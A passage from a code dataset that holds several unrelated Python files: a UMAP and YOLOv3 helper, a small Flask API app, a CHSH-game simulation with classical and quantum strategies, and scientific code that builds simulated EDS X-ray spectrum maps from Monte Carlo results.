        target_dim: The targeted dimension.

    Returns:
        Lower dimension representation of the data.
    """
    svd_limit = 30
    # TruncatedSVD works directly on sparse input, so it is used (instead of
    # PCA, which would densify) to pre-compress wide matrices.
    if data.shape[1] > svd_limit:
        svd = TruncatedSVD(n_components=svd_limit, random_state=random_state)
        data = svd.fit_transform(data)
    umap = UMAP(n_components=target_dim, random_state=random_state)
    return umap.fit_transform(data)
def load_yolov3():
    """Loads the custom weights and cfg for the YOLOv3 model.

    Downloads the weights via scripts/get_yolov3.sh on first use.

    Returns:
        Paths to YOLOv3 weights and cfg file.
    """
    root = get_project_root()
    weights_path = f"{root}/tmp/yolov3-spp_best.weights"
    # Fetch the weights only when they are not already cached under tmp/.
    if not isfile(weights_path):
        Popen(["./scripts/get_yolov3.sh"], cwd=root).wait()
    return weights_path, f"{root}/tmp/yolov3-spp.cfg"
| StarcoderdataPython |
56070 | """
python app/app.py -> http://0.0.0.0:8080/
"""
from app.models.database import db, ma
from flask_session import Session
from flask_api import FlaskAPI, status
from flask_assets import Environment
from flask_cors import CORS
from flask import jsonify
import logging
import time
from routes.main_db import main_db_bp
from routes.secondary_db import secondary_db_bp
# Application setup: config, CORS, assets, both databases, sessions, blueprints.
app = FlaskAPI(__name__)
app.logger.setLevel(logging.INFO)
# Cross-origin requests (with credentials/cookies) are allowed on /api/* only.
CORS(app, resources=r'/api/*', supports_credentials=True)
app.config.from_object('config')
Environment(app)
db.init_app(app)
ma.init_app(app)
Session(app)
app.register_blueprint(main_db_bp)
app.register_blueprint(secondary_db_bp)
# Server status
@app.route("/")
def server_status():
    """Health-check endpoint reporting service status and version."""
    # Across config.py, app.py, ../setup.py
    return jsonify({'status': 'ONLINE', 'version': '0.1'}), status.HTTP_200_OK
# For timeout testing
@app.route("/timeout_test/<seconds>")
def timeout_test(seconds):
    """Sleep for `seconds` seconds, then respond; used to exercise client timeouts."""
    time.sleep(int(seconds))
    return jsonify({'timeout_test': f'{seconds} seconds'}), status.HTTP_200_OK
# Error handling routes (Can't use blueprints)
@app.errorhandler(400)
def bad_request(_):
    """Return a JSON body for HTTP 400 responses."""
    return jsonify({'error': 'Bad request'}), status.HTTP_400_BAD_REQUEST
@app.errorhandler(404)
def not_found(_):
    """Return a JSON body for HTTP 404 responses."""
    return jsonify({'error': 'Not found'}), status.HTTP_404_NOT_FOUND
@app.errorhandler(405)
def not_allowed(_):
    """Return a JSON body for HTTP 405 responses."""
    return jsonify({'error': 'Method not allowed'}), status.HTTP_405_METHOD_NOT_ALLOWED
if __name__ == "__main__":
    # Development server entry point; the port must agree with the module docstring.
    app.run(debug=False, host='0.0.0.0', port=8080)
| StarcoderdataPython |
23819 | import random
from qlazy import QState
def classical_strategy(trials=1000):
    """Play `trials` rounds of the CHSH game with a fixed classical strategy.

    Charlie draws random bits (x, y); Alice and Bob always answer a = b = 0.
    A round is won when (x AND y) equals (a + b) mod 2.  The empirical win
    probability is printed.
    """
    wins = 0
    for _ in range(trials):
        # random bits by Charlie (x,y)
        x = random.randint(0, 1)
        y = random.randint(0, 1)
        # Alice and Bob both answer 0, regardless of the question bits.
        a = 0
        b = 0
        # Win condition of the CHSH game.
        if (x and y) == (a + b) % 2:
            wins += 1
    print("== result of classical strategy (trials:{0:d}) ==".format(trials))
    print("* win prob. = ", wins / trials)
def quantum_strategy(trials=1000):
    """Play `trials` rounds of the CHSH game with the entangled quantum strategy.

    Each round prepares a Bell pair; Alice measures qubit 0 in a basis chosen
    by x, Bob measures qubit 1 in a basis chosen by y.  Note both measurements
    act on the same QState object, so Alice's measurement collapses the shared
    state before Bob measures.  Prints the empirical win probability.
    """
    win_cnt = 0
    for _ in range(trials):
        # random bits by Charlie (x,y)
        x = random.randint(0,1)
        y = random.randint(0,1)
        # make entangled 2 qubits (one for Alice and another for Bob)
        qs = QState(2).h(0).cx(0,1)
        # response by Alice (a)
        # NOTE(review): `.lst` is assumed to hold the measured bit value as an
        # int comparable to 0 -- confirm against the qlazy MData API.
        if x == 0:
            # measurement of Z-basis (= Ry(0.0)-basis)
            sa = qs.m([0], shots=1, angle=0.0, phase=0.0).lst
            if sa == 0:
                a = 0
            else:
                a = 1
        else:
            # measurement of X-basis (or Ry(0.5*PI)-basis)
            sa = qs.mx([0], shots=1).lst
            # sa = qs.m([0], shots=1, angle=0.5, phase=0.0).lst
            if sa == 0:
                a = 0
            else:
                a = 1
        # response by Bob (b)
        if y == 0:
            # measurement of Ry(0.25*PI)-basis
            sb = qs.m([1], shots=1, angle=0.25, phase=0.0).lst
            if sb == 0:
                b = 0
            else:
                b = 1
        else:
            # measurement of Ry(-0.25*PI)-basis
            sb = qs.m([1], shots=1, angle=-0.25, phase=0.0).lst
            if sb == 0:
                b = 0
            else:
                b = 1
        # count up if win
        if (x and y) == (a+b)%2:
            win_cnt += 1
    print("== result of quantum strategy (trials:{0:d}) ==".format(trials))
    print("* win prob. = ", win_cnt/trials)
if __name__ == '__main__':
    # Run both strategies with the default trial count so the ~0.75 classical
    # and ~0.85 quantum win probabilities can be compared.
    classical_strategy()
    quantum_strategy()
| StarcoderdataPython |
3204611 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
.. py:currentmodule:: create_map
:synopsis: Create map from the mcxray simulation.
.. moduleauthor:: <NAME> <<EMAIL>>
Create map from the mcxray simulation.
"""
###############################################################################
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
# Standard library modules.
import logging
import math
import os.path
# Third party modules.
import h5py
import matplotlib.pyplot as plt
from scipy.constants import e
from numpy.random import normal, poisson
import numpy as np
# Local modules.
from pymcxray.mcxray import HDF5_PARAMETERS
# Project modules.
from xrayspectrummodeling.map.simulation_data import SimulationData
from xrayspectrummodeling import get_current_module_path
# Globals and constants variables.
# HDF5 attribute keys written on every map dataset (see _write_map).
MAP_WIDTH = "width"
MAP_HEIGHT = "height"
MAP_DEPTH = "depth"
MAP_DATA_TYPE = "data type"
MAP_PIXEL_TIME_s = "pixel time (s)"
MAP_CURRENT_nA = "current nA"
MAP_NOMINAL_NUMBER_ELECTRONS = "nominal number electrons"
MAP_SOLID_ANGLE_rad = "solid angle (rad)"
MAP_DETECTOR_NOISE_eV = "detector noise (eV)"
MAP_DETECTOR_RESOLUTION_AT_MN_eV = "detector resolution at Mn Ka (eV)"
MAP_COMMENTS = "comments"
# Names of the axis-scale datasets attached to each map's dimensions.
MAP_DATA_WIDTH_nm = "widths (nm)"
MAP_DATA_HEIGHT_nm = "heights (nm)"
MAP_DATA_DEPTH_keV = "energies (keV)"
class DetectorFunction(object):
    """Energy-dependent resolution model of an EDS X-ray detector.

    The FWHM at X-ray energy E combines a constant electronic-noise term with
    the Fano-limited statistical broadening of electron-hole pair creation:

        FWHM(E)^2 = noise^2 + (2*sqrt(2*ln 2))^2 * w * F * E

    where w = 3.8 eV is the electron-hole pair creation energy and F the Fano
    factor.  The formula was previously duplicated in the four scalar/array
    accessor methods; it now lives in a single shared helper.
    """

    def __init__(self, electronic_noise_eV, fano_factor=0.125):
        """Create a detector model.

        Args:
            electronic_noise_eV: Electronic noise contribution to the FWHM (eV).
            fano_factor: Fano factor of the detector material.
        """
        self._electronic_noise_eV = electronic_noise_eV
        self._fano_factor = fano_factor
        # Energy needed to create one electron-hole pair (eV).
        self._electron_hole_pair_eV = 3.8
        # Gaussian sigma <-> FWHM conversion factor: 2*sqrt(2*ln 2).
        self._numeric_factor = 2.0 * math.sqrt(2.0 * math.log(2.0))

    def _fwhm_squared_eV2(self, xray_energy_eV):
        """Return FWHM^2 in eV^2; works identically for scalars and NumPy arrays."""
        term1 = self._electronic_noise_eV ** 2
        term2 = self._numeric_factor * self._numeric_factor * self._electron_hole_pair_eV * self._fano_factor * xray_energy_eV
        return term1 + term2

    def getFwhm_eV(self, xrayEnergy_eV):
        """Return the detector FWHM (eV) at one X-ray energy (eV)."""
        fwhm_eV = math.sqrt(self._fwhm_squared_eV2(xrayEnergy_eV))
        return fwhm_eV

    def get_fwhms_eV(self, xray_energies_eV):
        """Return the detector FWHMs (eV) for an array of X-ray energies (eV)."""
        fwhms_eV = np.sqrt(self._fwhm_squared_eV2(xray_energies_eV))
        return fwhms_eV

    def getSigma_keV(self, xrayEnergy_keV):
        """Return the Gaussian sigma (keV) at one X-ray energy (keV)."""
        fwhm_keV = self.getFwhm_eV(xrayEnergy_keV * 1.0e3) / 1.0e3
        sigma_keV = fwhm_keV / self._numeric_factor
        return sigma_keV

    def get_sigmas_keV(self, xray_energies_keV):
        """Return the Gaussian sigmas (keV) for an array of X-ray energies (keV)."""
        fwhms_keV = self.get_fwhms_eV(xray_energies_keV * 1.0e3) / 1.0e3
        sigmas_keV = fwhms_keV / self._numeric_factor
        return sigmas_keV

    def getElectronicNoise_eV(self):
        """Return the electronic noise term (eV) supplied at construction."""
        return self._electronic_noise_eV
def get_efficiency():
    """Load the X-ray detector efficiency curve shipped with the package.

    Returns a 2-column array read from mcxray_XrayDetectorEfficiency.csv
    (column 0: energy in keV, column 1: efficiency, per its use in callers).
    """
    csv_path = get_current_module_path(__file__, r"../../data/mcxray_XrayDetectorEfficiency.csv")
    return np.loadtxt(csv_path, dtype=float, delimiter=',')
def create_test_map(data_path, figure=True):
    """Create small 3x3-pixel test spectrum maps for several dwell times.

    Reads simulated spectra from SimulationMapsMM2017_3x3.hdf5 under
    `data_path` and writes the generated maps into test_maps.hdf5.

    NOTE(review): this passes 15 arguments to _create_map, but the
    _create_map defined in this module takes 10 (current_nA, data_type,
    depth, detector_noise_eV, efficiency, maps_group, simulations_group,
    solid_angle_rad, time_s, positions).  Calling this function as written
    raises TypeError -- the call site looks stale; confirm against version
    history before use.
    """
    # Region id -> nominal composition label for the test sample.
    compositions = {1: "Fe-1wt%Co", 2: "Fe-2wt%Co", 3: "Fe-5wt%Co",
                    4: "Co-1wt%Ni", 5: "Co-2wt%Ni", 6: "Co-5wt%Ni",
                    7: "Fe-1wt%Co-49.5Ni", 8: "Fe-2wt%Co-49.0Ni", 9: "Fe-5wt%Co-47.5Ni"}
    width = 3
    height = 3
    depth = 1024
    data_type = np.int32
    current_nA = 1.0
    solid_angle_rad = 0.00140035
    detector_noise_eV = 50
    efficiency = get_efficiency()
    xs_nm = np.linspace(-5.0e3, 5.0e3, width)
    hdf5_file_path = os.path.join(data_path, r"SimulationMapsMM2017_3x3.hdf5")
    print(hdf5_file_path)
    with h5py.File(hdf5_file_path, 'r', driver='core') as hdf5_file:
        simulations_group = hdf5_file["simulations"]
        print(simulations_group.name)
        times_s = [0.05, 0.1, 0.5, 1.0, 5.0, 10.0]
        hdf5_file_out_path = os.path.join(data_path, r"test_maps.hdf5")
        # One output map dataset per dwell time.
        with h5py.File(hdf5_file_out_path, 'w', driver='core') as hdf5_file:
            maps_group = hdf5_file.require_group("maps")
            for time_s in times_s:
                _create_map(compositions, current_nA, data_type, depth, detector_noise_eV, efficiency, figure,
                            hdf5_file_out_path, height, maps_group, simulations_group, solid_angle_rad, time_s, width,
                            xs_nm)
def create_map_mm2017_abstract(data_path, figure=False):
    """Create the full 128x128 MM2017-abstract spectrum maps for several dwell times.

    Reads simulated spectra from SimulationMapsMM2017.hdf5 under `data_path`
    and writes the generated maps into map_mm2017_abstract.hdf5.

    NOTE(review): as in create_test_map, this passes 15 arguments to the
    10-parameter _create_map defined in this module and would raise
    TypeError if run -- the call site looks stale; confirm before use.
    """
    # Region id -> nominal composition label for the sample.
    compositions = {1: "Fe-1wt%Co", 2: "Fe-2wt%Co", 3: "Fe-5wt%Co",
                    4: "Co-1wt%Ni", 5: "Co-2wt%Ni", 6: "Co-5wt%Ni",
                    7: "Fe-1wt%Co-49.5Ni", 8: "Fe-2wt%Co-49.0Ni", 9: "Fe-5wt%Co-47.5Ni"}
    width = 128
    height = 128
    depth = 1024
    data_type = np.int32
    current_nA = 1.0
    solid_angle_rad = 0.00140035
    detector_noise_eV = 50
    efficiency = get_efficiency()
    xs_nm = np.linspace(-5.0e3, 5.0e3, width)
    hdf5_file_path = os.path.join(data_path, r"SimulationMapsMM2017.hdf5")
    with h5py.File(hdf5_file_path, 'r', driver='core') as hdf5_file:
        simulations_group = hdf5_file["simulations"]
        times_s = [0.05, 0.1, 0.5, 1.0, 5.0, 10.0]
        hdf5_file_out_path = os.path.join(data_path, r"map_mm2017_abstract.hdf5")
        # One output map dataset per dwell time.
        with h5py.File(hdf5_file_out_path, 'w', driver='core') as hdf5_file:
            maps_group = hdf5_file.require_group("maps")
            for time_s in times_s:
                _create_map(compositions, current_nA, data_type, depth, detector_noise_eV, efficiency, figure,
                            hdf5_file_out_path, height, maps_group, simulations_group, solid_angle_rad, time_s, width,
                            xs_nm)
def export_raw_test_map(data_path):
    """Export every map in analyzes/test_maps.hdf5 to Bruker .rpl/.raw file pairs.

    The per-map export logic here duplicated _export_raw_map line for line,
    so this now simply delegates to it with the test-map file path.

    Args:
        data_path: Directory containing the analyzes/test_maps.hdf5 file.
    """
    hdf5_file_out_path = os.path.join(data_path, r"analyzes\test_maps.hdf5")
    _export_raw_map(hdf5_file_out_path)
def read_raw_test_map(data_path):
    """Sanity-check an exported test map by plotting spectra and intensity images.

    Opens the 1 s (1000000 us) raw test map and produces: the pixel (1, 1)
    spectrum (from the cube and via getSpectrum), the sum spectrum, the total
    intensity image, and an ROI intensity image.  Figures are left open.
    """
    from pySpectrumFileFormat.Bruker.MapRaw.MapRawFormat import MapRawFormat
    file_path = os.path.join(data_path, r"test_maps_map_1000000_us.raw")
    map_raw = MapRawFormat(file_path)
    channels, datacube = map_raw.getDataCube()
    # Spectrum of pixel (1, 1) taken straight from the data cube.
    plt.figure()
    plt.plot(channels, datacube[1,1,:])
    # Same pixel via the reader's accessor, for comparison.
    x_data, y_data = map_raw.getSpectrum(1, 1)
    plt.figure()
    plt.plot(x_data, y_data)
    # Sum spectrum over all pixels.
    x_data, y_data = map_raw.getSumSpectrum()
    plt.figure()
    plt.plot(x_data, y_data)
    image = map_raw.getTotalIntensityImage()
    plt.figure()
    plt.imshow(image, cmap="gray")
    # Intensity image over a channel region of interest.
    roi = (210, 225)
    image = map_raw.getRoiIntensityImage(roi)
    plt.figure()
    plt.imshow(image, cmap="gray")
def export_raw_map_mm2017_abstract(data_path):
    """Export every map in map_mm2017_abstract.hdf5 to Bruker .rpl/.raw file pairs.

    The per-map export logic here duplicated _export_raw_map line for line,
    so this now simply delegates to it with the MM2017-abstract file path.

    Args:
        data_path: Directory containing the map_mm2017_abstract.hdf5 file.
    """
    hdf5_file_out_path = os.path.join(data_path, r"map_mm2017_abstract.hdf5")
    _export_raw_map(hdf5_file_out_path)
def read_raw_map_mm2017_abstract(data_path):
    """Sanity-check an exported MM2017 map: region sum spectra plus intensity images.

    Opens the 10 s (10000000 us) raw map, plots the sum spectrum of the whole
    cube and of three 32-pixel-wide vertical regions, then single-pixel, sum,
    total-intensity and ROI-intensity views (these last ones closed again).
    """
    from pySpectrumFileFormat.Bruker.MapRaw.MapRawFormat import MapRawFormat
    file_path = os.path.join(data_path, r"map_mm2017_abstract_map_10000000_us.raw")
    map_raw = MapRawFormat(file_path)
    channels, datacube = map_raw.getDataCube()
    print(datacube.shape)
    plt.figure()
    plt.title("All regions")
    plt.semilogy(channels, datacube.sum(axis=(0,1)))
    # Sum spectra of three row bands of the map (32 / 64 / remaining rows).
    plt.figure()
    plt.title("Region 1")
    plt.semilogy(channels, datacube[0:32, 0:32, :].sum(axis=(0,1)))
    plt.figure()
    plt.title("Region 2")
    plt.semilogy(channels, datacube[32:32*3, 0:32, :].sum(axis=(0,1)))
    plt.figure()
    plt.title("Region 3")
    plt.semilogy(channels, datacube[32*3:, 0:32, :].sum(axis=(0,1)))
    # The remaining figures are created and immediately closed (kept for
    # quick re-enabling while debugging).
    plt.figure()
    plt.plot(channels, datacube[1,1,:])
    plt.close()
    x_data, y_data = map_raw.getSpectrum(1, 1)
    plt.figure()
    plt.plot(x_data, y_data)
    plt.close()
    x_data, y_data = map_raw.getSumSpectrum()
    plt.figure()
    plt.plot(x_data, y_data)
    plt.close()
    image = map_raw.getTotalIntensityImage()
    plt.figure()
    plt.imshow(image, cmap="gray")
    plt.close()
    roi = (225, 235)
    image = map_raw.getRoiIntensityImage(roi)
    plt.figure()
    plt.imshow(image, cmap="gray")
    plt.close()
    plt.figure()
    plt.plot(x_data, np.linspace(0.0, 30.0, len(x_data)))
    plt.close()
def bse_image_mm2017(data_path):
    """Build and save the backscattered-electron (BSE) image for the MM2017 maps.

    Reads the backscattering coefficient of every simulated beam position from
    SimulationMapsMM2017.hdf5, places it on a 128x128 pixel grid, and saves
    the image as bse_image.png under `data_path`.
    """
    hdf5_file_path = os.path.join(data_path, r"SimulationMapsMM2017.hdf5")
    with h5py.File(hdf5_file_path, 'r', driver='core') as hdf5_file:
        simulations_group = hdf5_file["simulations"]
        width = 128
        height = width
        # Fix: np.float is an alias removed in NumPy 1.24; the builtin float
        # (float64) is the exact equivalent.
        data_type = float
        xs_nm = np.linspace(-5.0e3, 5.0e3, width)
        shape = (height, width)
        data = np.zeros(shape, dtype=data_type)
        for group in simulations_group.values():
            try:
                # Map the simulated beam position onto pixel indices.
                index_x = np.where(xs_nm == group.attrs["beamPosition"][0])[0][0]
                index_y = np.where(xs_nm == group.attrs["beamPosition"][1])[0][0]
                bse = group["ElectronResults"].attrs["Backscattering coefficient"]
                data[index_y, index_x] = bse
            except IndexError as message:
                # Beam position not on the expected grid: log and skip the pixel.
                logging.error(message)
                logging.info(group.name)
        plt.figure()
        plt.imshow(data, cmap='gray')
        plt.xticks([])
        plt.yticks([])
        figure_file_path = os.path.join(data_path, "bse_image.png")
        plt.savefig(figure_file_path)
        # plt.close()
def _create_electron_maps(data_path, hdf5_file_path, positions):
    """Plot and save the BSE, transmitted, skirted and corrected electron images.

    All images are read from `hdf5_file_path` through SimulationData and saved
    as PNG files under `data_path`/figures.
    """
    symbols = ['Fe', 'Co', 'Ni']
    simulation_data = SimulationData(hdf5_file_path, positions, symbols)
    # BSE map
    bse_map = simulation_data.get_bse_map()
    plt.figure()
    plt.imshow(bse_map, cmap='gray')
    plt.xticks([])
    plt.yticks([])
    figure_file_path = os.path.join(data_path, "figures", "bse_image.png")
    plt.savefig(figure_file_path)
    # plt.close()
    # TE map
    te_map = simulation_data.get_te_map()
    plt.figure()
    plt.imshow(te_map, cmap='gray')
    plt.xticks([])
    plt.yticks([])
    figure_file_path = os.path.join(data_path, "figures", "te_image.png")
    plt.savefig(figure_file_path)
    plt.close()
    # skirted electron map
    se_map = simulation_data.get_skirted_electron_map()
    plt.figure()
    plt.imshow(se_map, cmap='gray')
    plt.xticks([])
    plt.yticks([])
    figure_file_path = os.path.join(data_path, "figures", "se_image.png")
    plt.savefig(figure_file_path)
    plt.close()
    # TE corrected map: transmitted plus skirted electrons combined.
    te_map = simulation_data.get_te_map()
    plt.figure()
    plt.imshow(te_map+se_map, cmap='gray')
    plt.xticks([])
    plt.yticks([])
    figure_file_path = os.path.join(data_path, "figures", "transmitted_electron_image.png")
    plt.savefig(figure_file_path)
    # plt.close()
def _create_intensity_maps(data_path, hdf5_file_path, positions):
    """Plot generated/emitted Ka intensity images and emitted f-ratio images.

    For each of Fe and Co, saves a generated-intensity and an emitted-intensity
    Ka image, then an emitted f-ratio image (element intensity divided by the
    summed intensity of all elements) under `data_path`/figures.
    """
    symbols = ['Fe', 'Co']
    simulation_data = SimulationData(hdf5_file_path, positions, symbols)
    intensity_data = {}
    for symbol in symbols:
        intensity_data[symbol] = simulation_data.get_intensity_data(symbol)
        # Ka map
        # NOTE(review): per the plot titles, the last index selects 1 =
        # generated and 3 = emitted intensity -- confirm against
        # SimulationData.get_intensity_data's layout.
        intensity_map = np.sum(intensity_data[symbol][:, :, :, 0:1, 1], axis=(2,3))
        logging.debug(intensity_data[symbol].shape)
        logging.debug(intensity_map.shape)
        try:
            plt.figure()
            plt.title("{} Ka generated".format(symbol))
            plt.imshow(intensity_map, cmap='gray')
            plt.colorbar()
            plt.xticks([])
            plt.yticks([])
            figure_file_path = os.path.join(data_path, "figures", "intensity_{}_ka_generated_image.png".format(symbol))
            plt.savefig(figure_file_path)
            plt.close()
        except ValueError as message:
            # Plotting failed (e.g. unplottable map shape): log and move on.
            logging.error(message)
            logging.info(symbol)
        intensity_map = np.sum(intensity_data[symbol][:, :, :, 0:1, 3], axis=(2, 3))
        logging.info(intensity_data[symbol].shape)
        logging.info(intensity_map.shape)
        try:
            plt.figure()
            plt.title("{} Ka emitted".format(symbol))
            plt.imshow(intensity_map, cmap='gray')
            plt.colorbar()
            plt.xticks([])
            plt.yticks([])
            figure_file_path = os.path.join(data_path, "figures", "intensity_{}_ka_emitted_image.png".format(symbol))
            plt.savefig(figure_file_path)
            plt.close()
        except ValueError as message:
            logging.error(message)
            logging.info(symbol)
    # Reload the intensity data before computing the f-ratio maps.
    intensity_data = {}
    for symbol in symbols:
        intensity_data[symbol] = simulation_data.get_intensity_data(symbol)
    for symbol in symbols:
        # Ka f-ratio map
        intensity_element_map = np.sum(intensity_data[symbol][:, :, :, 0:1, 3], axis=(2, 3))
        intensity_total_map = np.zeros_like(intensity_element_map)
        for symbol_total in symbols:
            intensity_total_map += np.sum(intensity_data[symbol_total][:, :, :, 0:1, 3], axis=(2, 3))
        fratio_element_map = intensity_element_map / intensity_total_map
        try:
            plt.figure()
            plt.title("{} Ka emitted".format(symbol))
            # plt.imshow(fratio_element_map, cmap='gray', norm=colors.LogNorm(vmin=0.001, vmax=1.0))
            plt.imshow(fratio_element_map, cmap='gray', vmin=0.0, vmax=1.0)
            plt.colorbar()
            plt.xticks([])
            plt.yticks([])
            figure_file_path = os.path.join(data_path, "figures", "fratio_{}_ka_emitted_image.png".format(symbol))
            plt.savefig(figure_file_path)
            # plt.close()
        except ValueError as message:
            logging.error(message)
            logging.info(symbol)
def _create_spectra(data_path, hdf5_file_path, positions):
    """Plot emitted/detected spectra and a step-by-step detection model for one position.

    Only the first beam position is processed (note the [0:1] slice).  For it,
    the function saves: the emitted and detected spectra from SimulationData,
    then a hand-computed detection chain (efficiency, counts conversion,
    rebinning, detector resolution, repeated noisy detection) as PNG files
    under `data_path`/figures.
    """
    symbols = ['Fe', 'Co', 'Ni']
    simulation_data = SimulationData(hdf5_file_path, positions, symbols)
    for position in positions.get_list()[0:1]:
        # Emitted spectrum as stored in the simulation results.
        energies_keV, spectrum = simulation_data.get_emitted_spectrum(position)
        plt.figure()
        title = "{0} ({1}, {2})".format("Emitted", position[0], position[1])
        plt.title(title)
        plt.semilogy(energies_keV, spectrum)
        plt.xlabel("Energy (keV)")
        plt.ylabel("Intensity (1/keV/e-/sr)")
        file_name = "{0}_{1}_{2}.png".format("Spectrum_Emitted", position[0], position[1])
        figure_file_path = os.path.join(data_path, "figures", file_name)
        plt.savefig(figure_file_path)
        plt.close()
        # Detected spectrum as stored in the simulation results.
        energies_keV, spectrum = simulation_data.get_detected_spectrum(position)
        plt.figure()
        title = "{0} ({1}, {2})".format("Detected", position[0], position[1])
        plt.title(title)
        plt.semilogy(energies_keV, spectrum)
        plt.xlabel("Energy (keV)")
        plt.ylabel("Intensity (photons)")
        # NOTE(review): the `ymin` keyword was dropped in newer Matplotlib
        # releases in favour of `bottom` -- confirm the installed version.
        plt.ylim(ymin=1)
        file_name = "{0}_{1}_{2}.png".format("Spectrum_Detected", position[0], position[1])
        figure_file_path = os.path.join(data_path, "figures", file_name)
        plt.savefig(figure_file_path)
        plt.close()
        # Calculated detected: rebuild the detected spectrum from the emitted
        # one using the same dose/efficiency/resolution model as _create_map.
        current_nA = 1.0
        solid_angle_rad = 0.00140035
        detector_noise_eV = 50
        efficiency = get_efficiency()
        time_s = 100.0
        depth = 128
        nominal_number_electrons, number_electrons = _compute_number_electrons(current_nA, time_s)
        logging.debug("{} {}".format(nominal_number_electrons, number_electrons))
        energy_data, intensity_data_1_ekeVsr = simulation_data.get_emitted_spectrum(position)
        # Apply the detector efficiency curve, interpolated onto this grid.
        intensity_efficiency_data_1_ekeVsr = intensity_data_1_ekeVsr * np.interp(energy_data, efficiency[:, 0],
                                                                                 efficiency[:, 1])
        plt.figure()
        title = "{} ({}, {})".format("Emitted * efficiency", position[0], position[1])
        plt.title(title)
        plt.semilogy(energy_data, intensity_data_1_ekeVsr, '.')
        plt.semilogy(energy_data, intensity_efficiency_data_1_ekeVsr, '.')
        plt.xlabel("Energy (keV)")
        plt.ylabel("Intensity (1/keV/e-/sr)")
        file_name = "{0}_{1}_{2}.png".format("Spectrum_Emitted_Efficiency", position[0], position[1])
        figure_file_path = os.path.join(data_path, "figures", file_name)
        plt.savefig(figure_file_path)
        plt.close()
        # Convert to photon counts: dose x solid angle x channel width.
        delta_energy_keV = energy_data[1] - energy_data[0]
        intensity_data = intensity_efficiency_data_1_ekeVsr * number_electrons * solid_angle_rad * delta_energy_keV
        plt.figure()
        title = "{} ({}, {}), t = {} s".format("Emitted counts", position[0], position[1], time_s)
        plt.title(title)
        plt.semilogy(energy_data, intensity_data, '.')
        plt.xlabel("Energy (keV)")
        plt.ylabel("Intensity (photons)")
        plt.ylim(ymin=1)
        file_name = "{}_{}_{}_t{}s.png".format("Spectrum_Emitted_Counts", position[0], position[1], time_s)
        figure_file_path = os.path.join(data_path, "figures", file_name)
        plt.savefig(figure_file_path)
        plt.close()
        # Rebin onto the coarser `depth`-channel output energy scale.
        energy_edges_keV = np.linspace(0.0, 30.0, depth + 1)
        energies_keV = np.linspace(0.0, 30.0, depth)
        counts_data = change_energy_scale2(energy_data, intensity_data, energy_edges_keV)
        plt.figure()
        title = "{} ({}, {}), t = {} s".format("Emitted counts", position[0], position[1], time_s)
        plt.title(title)
        plt.semilogy(energy_data, intensity_data, '-')
        plt.semilogy(energies_keV, counts_data, '.')
        plt.xlabel("Energy (keV)")
        plt.ylabel("Intensity (photons)")
        plt.ylim(ymin=1)
        file_name = "{}_{}_{}_t{}s.png".format("Spectrum_Emitted_Counts", position[0], position[1], time_s)
        figure_file_path = os.path.join(data_path, "figures", file_name)
        plt.savefig(figure_file_path)
        # plt.close()
        # Detector resolution as a function of energy (sigma and FWHM).
        detector = DetectorFunction(detector_noise_eV)
        sigmas_keV = detector.get_sigmas_keV(energies_keV)
        fwhms_eV = detector.get_fwhms_eV(energies_keV*1.0e3)
        plt.figure()
        plt.title("Detector")
        plt.plot(energies_keV, sigmas_keV)
        plt.plot(energies_keV, fwhms_eV/1.0e3)
        plt.xlabel("Energy (keV)")
        plt.ylabel("Sigma (keV)")
        # plt.ylim(ymin=1)
        file_name = "{}_{}_{}_t{}s.png".format("Detector", position[0], position[1], time_s)
        figure_file_path = os.path.join(data_path, "figures", file_name)
        plt.savefig(figure_file_path)
        plt.close()
        # Average several noisy detections to compare with the noise-free counts.
        plt.figure()
        title = "{} ({}, {}), t = {} s".format("Detected", position[0], position[1], time_s)
        plt.title(title)
        mean_intensity = np.zeros_like(energies_keV)
        number_repetitions = 50
        for repetition in range(number_repetitions):
            xrays = _compute_xrays(detector_noise_eV, energies_keV, counts_data)
            counts, _bin_edges = np.histogram(xrays, bins=energy_edges_keV)
            mean_intensity += counts
            # plt.semilogy(energies_keV, counts, label=repetition)
            logging.debug("{:d} {:d} {:d}".format(int(np.sum(counts_data)), len(xrays), int(np.sum(counts_data)-len(xrays))))
            logging.debug("{:d} {:d} {:d}".format(len(xrays), int(np.sum(counts)) , len(xrays) - int(np.sum(counts))))
        mean_intensity /= number_repetitions
        plt.semilogy(energies_keV, counts_data)
        plt.semilogy(energies_keV, mean_intensity)
        plt.xlabel("Energy (keV)")
        plt.ylabel("Intensity (photons)")
        plt.ylim(ymin=1)
        # plt.legend()
        file_name = "{}_{}_{}_t{}s.png".format("Spectrum_Detected", position[0], position[1], time_s)
        figure_file_path = os.path.join(data_path, "figures", file_name)
        plt.savefig(figure_file_path)
        # plt.close()
def compute_histogram(energy_data, intensity_data, energy_edges_keV):
    """Histogram intensities by repeating each energy int(round(intensity)) times.

    The original implementation built one Python list element per photon via
    repeated list.extend; np.repeat builds the same sample array in one
    vectorized call without changing the result.

    Args:
        energy_data: Channel energies (keV).
        intensity_data: Per-channel intensities; rounded to whole photon counts.
        energy_edges_keV: Histogram bin edges (keV).

    Returns:
        Integer counts per bin (len(energy_edges_keV) - 1 entries).
    """
    repeats = [int(round(intensity)) for intensity in intensity_data]
    xrays = np.repeat(energy_data, repeats)
    counts_data, _bin_edges = np.histogram(xrays, bins=energy_edges_keV)
    # Log how many photons were lost (or gained) to rounding.
    logging.info("{:d} {:d} {:d}".format(int(np.sum(intensity_data)), len(xrays), int(np.sum(intensity_data) - len(xrays))))
    return counts_data
def change_energy_scale(energy_data, intensity_data, energy_edges_keV):
    """Rebin intensities onto the bins defined by energy_edges_keV (slow reference).

    Each intensity is added to the bin whose half-open interval
    [edge[i], edge[i+1]) contains its energy; energies outside every bin are
    dropped.  Fixes: np.float (alias removed in NumPy 1.24) -> float, and the
    inner scan stops at the first matching bin since bins are disjoint.

    Args:
        energy_data: Sample energies (keV).
        intensity_data: Intensity per sample.
        energy_edges_keV: Monotonically increasing bin edges (keV).

    Returns:
        Float array of summed intensities, one entry per bin.
    """
    counts_data = np.zeros(len(energy_edges_keV) - 1, dtype=float)
    for energy_keV, intensity in zip(energy_data, intensity_data):
        for i in range(len(energy_edges_keV) - 1):
